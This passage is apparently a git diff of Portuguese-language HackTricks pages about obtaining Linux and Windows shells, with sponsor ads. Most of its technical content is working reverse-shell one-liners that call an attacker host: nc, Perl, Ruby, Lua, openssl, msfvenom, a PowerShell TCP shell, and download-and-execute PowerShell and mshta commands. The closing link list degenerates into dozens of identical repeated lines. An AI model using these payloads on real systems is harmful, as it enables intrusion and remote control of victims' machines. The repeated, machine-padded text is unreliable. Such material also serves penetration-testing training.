msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
```
### **Bash**
Bash é uma linguagem de script amplamente utilizada em sistemas operacionais baseados em Unix. É uma ferramenta poderosa para a automação de tarefas e pode ser usada para criar scripts de shell que executam várias tarefas, como gerenciamento de arquivos, instalação de pacotes e execução de comandos do sistema. O Bash também é uma ferramenta útil para hackers, pois pode ser usado para criar scripts de shell que automatizam tarefas de hacking, como a criação de payloads do Metasploit usando o msfvenom.
Bash é uma linguagem de script amplamente utilizada em sistemas operacionais baseados em Unix. É uma das shells mais populares e oferece uma ampla gama de recursos e funcionalidades. O Bash é conhecido por sua flexibilidade e facilidade de uso, tornando-o uma escolha popular entre os hackers.
#### **Injeção de código Bash**
A injeção de código Bash é uma técnica comum usada por hackers para explorar vulnerabilidades em sistemas. Envolve a inserção de comandos Bash maliciosos em entradas de usuário não filtradas, permitindo que os hackers executem comandos arbitrários no sistema alvo.
#### **Execução de comandos Bash**
A execução de comandos Bash é uma técnica usada para executar comandos no sistema operacional usando a shell Bash. Os hackers podem explorar essa técnica para executar comandos maliciosos no sistema alvo, permitindo-lhes obter acesso não autorizado ou realizar outras atividades prejudiciais.
#### **Scripts Bash maliciosos**
Os scripts Bash maliciosos são programas de script escritos na linguagem Bash que têm a intenção de realizar atividades maliciosas. Esses scripts podem ser usados para realizar várias ações, como roubar informações confidenciais, comprometer a segurança do sistema ou causar danos aos dados.
#### **Proteção contra ataques Bash**
Para proteger um sistema contra ataques Bash, é importante implementar práticas de segurança adequadas, como:
- Filtrar e validar todas as entradas de usuário para evitar a injeção de código malicioso.
- Manter o sistema operacional e os softwares atualizados com as últimas correções de segurança.
- Usar firewalls e sistemas de detecção de intrusões para monitorar e bloquear atividades suspeitas.
- Implementar políticas de acesso e permissões adequadas para restringir o acesso não autorizado.
- Realizar testes de penetração regulares para identificar e corrigir vulnerabilidades no sistema.
Ao seguir essas práticas de segurança, é possível reduzir significativamente o risco de ataques Bash e proteger o sistema contra hackers maliciosos.
```bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
```
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais sobre bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novas recompensas por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se uma lenda hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) e comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira [**produtos oficiais PEASS & HackTricks**](https://peass.creator-spring.com)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

359
generic-methodologies-and-resources/shells/windows.md
View file

@ -8,24 +8,31 @@
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
[**Siga HackenProof**](https://bit.ly/3xrrDrL) **para aprender mais sobre bugs web3**
**HackenProof é o lar de todas as recompensas por bugs de criptografia.**
🐞 Leia tutoriais de bugs web3
**Seja recompensado sem atrasos**\
As recompensas do HackenProof são lançadas apenas quando os clientes depositam o orçamento de recompensa. Você receberá a recompensa após a verificação do bug.
🔔 Receba notificações sobre novos programas de recompensa por bugs
**Adquira experiência em pentesting web3**\
Protocolos de blockchain e contratos inteligentes são a nova Internet! Domine a segurança web3 em seus dias de ascensão.
💬 Participe de discussões na comunidade
**Torne-se a lenda do hacker web3**\
Ganhe pontos de reputação com cada bug verificado e conquiste o topo do leaderboard semanal.
[**Cadastre-se no HackenProof**](https://hackenproof.com/register) comece a ganhar com seus hacks!
{% embed url="https://hackenproof.com/register" %}
## Lolbas
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows, assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (abusados) para executar algum tipo de ação inesperada, como **executar código arbitrário**.
A página [lolbas-project.github.io](https://lolbas-project.github.io/) é para Windows assim como [https://gtfobins.github.io/](https://gtfobins.github.io/) é para linux.\
Obviamente, **não existem arquivos SUID ou privilégios sudo no Windows**, mas é útil saber **como** alguns **binários** podem ser (abusados) para realizar algum tipo de ação inesperada como **executar código arbitrário**.
## NC
```bash
@ -33,7 +40,7 @@ nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## SBD
**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. O sbd possui recursos de criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha da porta de origem, reconexão contínua com atraso e outros recursos interessantes. O sbd suporta apenas comunicação TCP/IP. O sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser enviado para um computador com Windows como uma alternativa ao Netcat.
**sbd** é um clone do Netcat, projetado para ser portátil e oferecer criptografia forte. Ele roda em sistemas operacionais semelhantes ao Unix e no Microsoft Win32. sbd possui criptografia AES-CBC-128 + HMAC-SHA1 (por Christophe Devine), execução de programas (opção -e), escolha da porta de origem, reconexão contínua com atraso e outras funcionalidades interessantes. sbd suporta apenas comunicação TCP/IP. O sbd.exe (parte da distribuição Kali Linux: /usr/share/windows-resources/sbd/sbd.exe) pode ser enviado para um computador com Windows como uma alternativa ao Netcat.
## Python
```bash
@ -67,7 +74,8 @@ $port = 4444;
$proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($ip)));
$sin = sockaddr_in($port, inet_aton($ip));
connect(SOCKET, $sin);
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
@ -76,37 +84,36 @@ open(STDERR, ">&SOCKET");
system("/bin/sh -i");
```
Neste exemplo, o hacker especifica o endereço IP do servidor remoto e a porta na qual deseja se conectar. Em seguida, a shell estabelece uma conexão com o servidor remoto e redireciona as entradas e saídas padrão para essa conexão. Por fim, o hacker pode executar comandos no sistema alvo usando a shell.
Neste exemplo, o hacker especifica o endereço IP e a porta do servidor remoto. A shell Perl se conecta ao servidor remoto e redireciona as entradas e saídas padrão para a conexão. Em seguida, o hacker pode executar comandos no sistema alvo.
### Considerações Finais
As shells Perl são ferramentas poderosas para hackers durante um teste de penetração. Elas permitem a execução de comandos no sistema alvo e podem ser usadas para obter acesso persistente. No entanto, é importante lembrar que o uso de shells Perl para fins maliciosos é ilegal e antiético. Essas técnicas devem ser usadas apenas para fins educacionais e autorizados.
As shells Perl são ferramentas poderosas para hackers durante um teste de penetração. Elas permitem a execução de comandos no sistema alvo e podem ser usadas para obter acesso persistente. No entanto, é importante lembrar que o uso de shells Perl para fins maliciosos é ilegal e antiético.
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
Ruby é uma linguagem de programação dinâmica, orientada a objetos e de código aberto. É conhecida por sua sintaxe simples e expressiva, o que a torna uma escolha popular entre os desenvolvedores. Ruby é frequentemente usado para desenvolvimento web, automação de tarefas e scripting.
Ruby é uma linguagem de programação dinâmica, orientada a objetos e de código aberto. É conhecida por sua sintaxe simples e expressiva, o que a torna fácil de ler e escrever. Ruby é frequentemente usado para desenvolvimento web e scripting.
### Instalação do Ruby
Para começar a usar o Ruby, você precisa instalá-lo em seu sistema. Aqui estão as etapas para instalar o Ruby em um sistema Windows:
Para começar a usar o Ruby, você precisa instalá-lo em seu sistema. Siga as etapas abaixo para instalar o Ruby em um ambiente Windows:
1. Baixe o instalador do Ruby para Windows no site oficial do Ruby (https://www.ruby-lang.org/pt/downloads/).
2. Execute o instalador e siga as instruções na tela.
3. Selecione a opção "Adicionar Ruby ao PATH" durante a instalação para que o Ruby possa ser executado a partir de qualquer diretório no prompt de comando.
4. Após a conclusão da instalação, abra o prompt de comando e digite `ruby -v` para verificar se o Ruby foi instalado corretamente. Você deve ver a versão do Ruby instalada.
2. Execute o instalador e siga as instruções na tela para concluir a instalação.
3. Após a instalação, abra o prompt de comando e digite `ruby -v` para verificar se o Ruby foi instalado corretamente. Você deve ver a versão do Ruby instalada.
### Executando um script Ruby
Depois de instalar o Ruby, você pode executar scripts Ruby usando o interpretador de linha de comando. Siga estas etapas para executar um script Ruby:
Depois de instalar o Ruby, você pode executar scripts Ruby usando o prompt de comando. Siga as etapas abaixo para executar um script Ruby:
1. Crie um novo arquivo com a extensão `.rb`, por exemplo, `meu_script.rb`.
2. Abra o arquivo em um editor de texto e escreva seu código Ruby.
3. Salve o arquivo.
3. Salve o arquivo e feche o editor de texto.
4. Abra o prompt de comando e navegue até o diretório onde o arquivo `.rb` está localizado.
5. Digite `ruby meu_script.rb` e pressione Enter para executar o script.
5. Digite `ruby meu_script.rb` no prompt de comando e pressione Enter para executar o script Ruby.
### Exemplo de script Ruby
@ -116,11 +123,11 @@ Aqui está um exemplo simples de um script Ruby que exibe uma mensagem na tela:
puts "Olá, mundo!"
```
Salve o código acima em um arquivo chamado `meu_script.rb` e execute-o usando o comando `ruby meu_script.rb`. Você verá a mensagem "Olá, mundo!" impressa no prompt de comando.
Salve o código acima em um arquivo chamado `meu_script.rb` e execute-o usando o prompt de comando. Você verá a mensagem "Olá, mundo!" impressa na tela.
### Conclusão
Ruby é uma linguagem de programação poderosa e versátil que pode ser usada para uma variedade de tarefas. Com a instalação correta e o conhecimento básico da sintaxe Ruby, você pode começar a escrever seus próprios scripts e explorar as possibilidades dessa linguagem.
Ruby é uma linguagem de programação poderosa e fácil de aprender. Com a instalação correta e um editor de texto, você pode começar a escrever e executar scripts Ruby em pouco tempo. Experimente e divirta-se explorando o mundo da programação com Ruby!
```bash
#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
@ -131,25 +138,28 @@ Lua é uma linguagem de programação leve e poderosa que é frequentemente usad
### Introdução
Lua é uma linguagem interpretada, o que significa que o código Lua é executado por um interpretador em vez de ser compilado em código de máquina. Isso torna o desenvolvimento e a depuração mais rápidos e flexíveis.
Lua é uma linguagem interpretada, o que significa que o código Lua é executado por um interpretador em vez de ser compilado em código de máquina. Isso torna o desenvolvimento e a execução de scripts Lua rápidos e flexíveis.
### Características
- **Simplicidade**: Lua possui uma sintaxe simples e elegante, o que a torna fácil de aprender e usar.
- **Eficiência**: Lua é projetada para ser rápida e eficiente, com um tempo de execução leve e um gerenciamento eficiente de memória.
- **Extensibilidade**: Lua pode ser estendida com bibliotecas escritas em outras linguagens, como C e C++, permitindo a integração com sistemas existentes.
- **Portabilidade**: Lua é altamente portátil e pode ser executada em uma ampla variedade de plataformas, incluindo Windows, Linux e macOS.
- **Embeddability**: Lua pode ser facilmente incorporada em outros aplicativos, permitindo que eles sejam estendidos com scripts Lua.
- **Simplicidade**: Lua possui uma sintaxe simples e elegante, tornando-a fácil de aprender e usar.
- **Eficiência**: Lua é projetada para ser rápida e eficiente, com um tempo de execução leve e um consumo de recursos mínimo.
- **Portabilidade**: Lua é altamente portátil e pode ser executada em uma ampla variedade de plataformas, incluindo Windows, Linux, macOS e dispositivos embarcados.
- **Integração**: Lua pode ser facilmente integrada com outras linguagens, como C e C++, permitindo que você estenda a funcionalidade de seus aplicativos existentes.
- **Extensibilidade**: Lua é altamente extensível, permitindo que você crie suas próprias bibliotecas e módulos para estender suas capacidades.
### Uso em Hacking
### Uso de Lua em Hacking
Lua é frequentemente usada em hacking para automatizar tarefas e criar scripts personalizados. Sua simplicidade e facilidade de integração com outras linguagens a tornam uma escolha popular entre os hackers.
Lua pode ser usado em várias etapas do processo de hacking, incluindo:
Além disso, Lua é amplamente suportada por várias ferramentas de hacking e frameworks, o que facilita sua utilização em diferentes cenários de hacking.
- **Automatização**: Lua pode ser usado para automatizar tarefas repetitivas, como a execução de comandos em um shell ou a manipulação de arquivos.
- **Exploração**: Lua pode ser usado para escrever exploits e explorar vulnerabilidades em sistemas alvo.
- **Engenharia reversa**: Lua pode ser usado para analisar e entender o funcionamento interno de aplicativos e sistemas.
- **Desenvolvimento de ferramentas**: Lua pode ser usado para desenvolver suas próprias ferramentas de hacking, como scanners de vulnerabilidades ou frameworks de teste de penetração.
### Conclusão
Lua é uma linguagem de programação poderosa e versátil que pode ser usada para uma variedade de finalidades, incluindo hacking. Sua simplicidade, eficiência e extensibilidade a tornam uma escolha popular entre os hackers. Se você está interessado em aprender Lua, existem muitos recursos disponíveis online para ajudá-lo a começar.
Lua é uma linguagem de programação versátil e poderosa que pode ser usada em uma variedade de cenários de hacking. Sua simplicidade, eficiência e capacidade de integração a tornam uma escolha popular entre os hackers. Se você está interessado em aprender mais sobre Lua, existem muitos recursos disponíveis online para ajudá-lo a começar.
```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
@ -193,11 +203,11 @@ O PowerShell Empire é uma estrutura de pós-exploração de código aberto que
### Cobalt Strike
O Cobalt Strike é uma plataforma comercial de testes de penetração que oferece recursos avançados de pós-exploração. Ele permite que os hackers realizem ataques direcionados e mantenham o acesso persistente a sistemas Windows comprometidos.
O Cobalt Strike é uma plataforma comercial de testes de penetração que oferece recursos avançados de pós-exploração. Ele permite que os hackers realizem ataques sofisticados em sistemas Windows, incluindo a criação de shells e a execução de comandos remotos.
## Conclusão
Obter um shell em sistemas Windows é uma etapa crucial no processo de hacking. Existem várias técnicas e recursos disponíveis para obter acesso remoto a sistemas Windows, como reverse shells, web shells e exploits. Ferramentas como o Metasploit Framework, o PowerShell Empire e o Cobalt Strike podem ser usadas para facilitar esse processo. É importante lembrar que o hacking é ilegal sem permissão adequada e deve ser realizado apenas para fins éticos de teste de penetração.
Obter um shell em sistemas Windows é uma etapa crucial no processo de hacking. Existem várias técnicas e recursos disponíveis para alcançar esse objetivo. É importante entender essas técnicas e recursos para realizar testes de penetração eficazes em sistemas Windows.
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -224,25 +234,24 @@ O PowerShell oferece vários benefícios para os administradores de sistemas:
### Usando o Powershell para hacking
O PowerShell também pode ser usado para fins maliciosos, como parte de um ataque cibernético. Os hackers podem explorar as funcionalidades avançadas do PowerShell para executar comandos maliciosos, obter informações confidenciais e comprometer sistemas.
O PowerShell também pode ser usado como uma ferramenta poderosa para hackers. Ele fornece uma ampla gama de recursos e funcionalidades que podem ser explorados para realizar ataques e comprometer sistemas.
Alguns exemplos de técnicas de hacking usando o PowerShell incluem:
- Execução remota de comandos: os hackers podem usar o PowerShell para executar comandos em sistemas remotos, permitindo que eles controlem esses sistemas de forma remota.
- Escalonamento de privilégios: o PowerShell pode ser usado para explorar vulnerabilidades e obter privilégios elevados em um sistema comprometido.
- Exfiltração de dados: o PowerShell pode ser usado para extrair dados confidenciais de um sistema comprometido e enviá-los para um servidor controlado pelo hacker.
- Execução de comandos maliciosos: o PowerShell pode ser usado para executar comandos maliciosos em um sistema comprometido, permitindo que um hacker execute ações não autorizadas.
- Escalonamento de privilégios: o PowerShell pode ser usado para explorar vulnerabilidades e escalonar privilégios em um sistema comprometido, permitindo que um hacker obtenha acesso privilegiado.
- Exfiltração de dados: o PowerShell pode ser usado para exfiltrar dados confidenciais de um sistema comprometido, permitindo que um hacker roube informações sensíveis.
### Protegendo-se contra ataques do PowerShell
Para se proteger contra ataques do PowerShell, é importante implementar as seguintes práticas de segurança:
- Restringir o uso do PowerShell: é recomendável restringir o uso do PowerShell apenas a usuários confiáveis e autorizados.
- Monitorar o uso do PowerShell: é importante monitorar o uso do PowerShell em sua rede para detectar atividades suspeitas.
- Atualizar regularmente: mantenha o PowerShell e outros softwares relacionados atualizados para se beneficiar das correções de segurança mais recentes.
- Implementar políticas de segurança: implemente políticas de segurança que limitem o acesso e o uso do PowerShell em sua organização.
- Conscientização do usuário: eduque os usuários sobre os riscos associados ao uso do PowerShell e a importância de seguir as práticas de segurança recomendadas.
- Restringir o acesso ao PowerShell: limite o acesso ao PowerShell apenas a usuários autorizados e monitore o uso do PowerShell para detectar atividades suspeitas.
- Atualizar regularmente: mantenha o sistema operacional e o PowerShell atualizados com as últimas correções de segurança para evitar vulnerabilidades conhecidas.
- Usar soluções de segurança: implemente soluções de segurança, como antivírus e firewalls, para detectar e bloquear atividades maliciosas do PowerShell.
- Educação e conscientização: treine os usuários sobre os riscos associados ao uso do PowerShell e promova a conscientização sobre as melhores práticas de segurança.
O PowerShell é uma ferramenta poderosa que pode ser usada tanto para fins legítimos quanto maliciosos. Ao entender suas funcionalidades e implementar práticas de segurança adequadas, você pode aproveitar ao máximo o PowerShell enquanto protege seus sistemas contra ataques.
O PowerShell é uma ferramenta poderosa que pode ser usada tanto para fins legítimos quanto maliciosos. Ao entender seus recursos e funcionalidades, os administradores de sistemas podem aproveitar ao máximo o PowerShell para automatizar tarefas e melhorar a eficiência operacional, ao mesmo tempo em que implementam medidas de segurança adequadas para proteger seus sistemas contra ataques.
```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
@ -261,27 +270,174 @@ Carga gravada no disco: **Cache local do cliente WebDAV**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
O comando `mshta` é uma ferramenta do Windows que permite executar arquivos HTML como aplicativos. Isso pode ser útil para executar scripts maliciosos ou explorar vulnerabilidades no sistema. O `mshta` pode ser usado para executar comandos do PowerShell, permitindo assim a execução de scripts maliciosos sem a necessidade de um arquivo .ps1.
O comando `mshta` é uma ferramenta do Windows que permite executar arquivos HTML como aplicativos. Essa funcionalidade pode ser explorada por hackers para executar código malicioso no sistema alvo. O `mshta` pode ser usado para contornar as restrições de segurança do Windows e executar comandos arbitrários.
### Sintaxe
```
mshta vbscript:Close(Execute("GetObject(""script:https://URL"")"))
mshta <URL>
```
### Explicação
O comando `mshta` é usado para executar um script VBS (Visual Basic Script) embutido. O script VBS é responsável por executar o comando `GetObject` para obter o script PowerShell a partir de uma URL especificada. Em seguida, o comando `Execute` é usado para executar o script PowerShell obtido.
### Exemplo
```
mshta vbscript:Close(Execute("GetObject(""script:https://example.com/malicious_script.ps1"")"))
mshta http://www.example.com/malicious.hta
```
Neste exemplo, o `mshta` é usado para executar um script PowerShell malicioso hospedado em `https://example.com/malicious_script.ps1`. O script será baixado e executado no sistema alvo.
Neste exemplo, o `mshta` é usado para executar o arquivo `malicious.hta` hospedado no site `www.example.com`. O arquivo `malicious.hta` pode conter código malicioso que será executado no sistema alvo.
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
### Detecção e Prevenção
Devido à natureza maliciosa do `mshta`, é importante tomar medidas para detectar e prevenir seu uso indevido. Algumas medidas que podem ser tomadas incluem:
- Manter o sistema operacional e os aplicativos atualizados com as últimas correções de segurança.
- Utilizar soluções de segurança, como antivírus e firewalls, para detectar e bloquear atividades maliciosas.
- Restringir o acesso a sites não confiáveis e evitar clicar em links suspeitos.
- Monitorar o tráfego de rede em busca de atividades suspeitas.
### Recursos Adicionais
Para obter mais informações sobre diferentes shells do Powershell, consulte os seguintes recursos:
- [PowerShell Empire](https://github.com/EmpireProject/Empire)
- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
- [Msfvenom](https://www.metasploit.com/)
- [Powershell-C2](https://github.com/PowerShellEmpire/Empire)
- [Powershell-AD-Recon](https://github.com/sense-of-security/PowerShell-AD-Recon)
- [Powershell-AD-Privilege-Escalation](https://github.com/sense-of-security/PowerShell-AD-Privilege-Escalation)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Exploitation](https://github.com/sense-of-security/PowerShell-AD-Exploitation)
- [Powershell-AD-Post-Exploitation](https://github.com/sense-of-security/PowerShell-AD-Post-Exploitation)
- [Powershell-AD-Deception](https://github.com/sense-of-security/PowerShell-AD-Deception)
- [Powershell-AD-Defence](https://github.com/sense-of-security/PowerShell-AD-Defence)
- [Powershell-AD-Reporting](https://github.com/sense-of-security/PowerShell-AD-Reporting)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
- [Powershell-AD-Enumeration](https://github.com/sense-of-security/PowerShell-AD-Enumeration)
